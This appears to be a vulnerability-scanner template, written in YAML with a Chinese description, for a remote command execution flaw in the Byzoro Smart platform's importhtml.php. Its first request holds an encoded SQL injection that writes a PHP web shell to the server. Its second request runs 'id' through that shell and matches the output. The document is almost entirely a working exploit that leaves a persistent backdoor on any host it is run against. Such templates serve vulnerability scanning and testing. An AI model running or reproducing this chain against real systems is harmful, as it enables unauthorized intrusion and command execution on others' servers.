id: byzoro-smart-importhtml-rce

info:
  name: 百卓 Smart importhtml.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    百卓 importhtml.php文件sql语句无过滤，通过Sql语句可远程命令执行
    title="Smart管理平台"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E7%99%BE%E5%8D%93/%E7%99%BE%E5%8D%93%20Smart%20importhtml.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn
    expression: response.status == 200
  r1:
    request:
      method: POST
      path: /app/sys1.php
      body: |
        cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()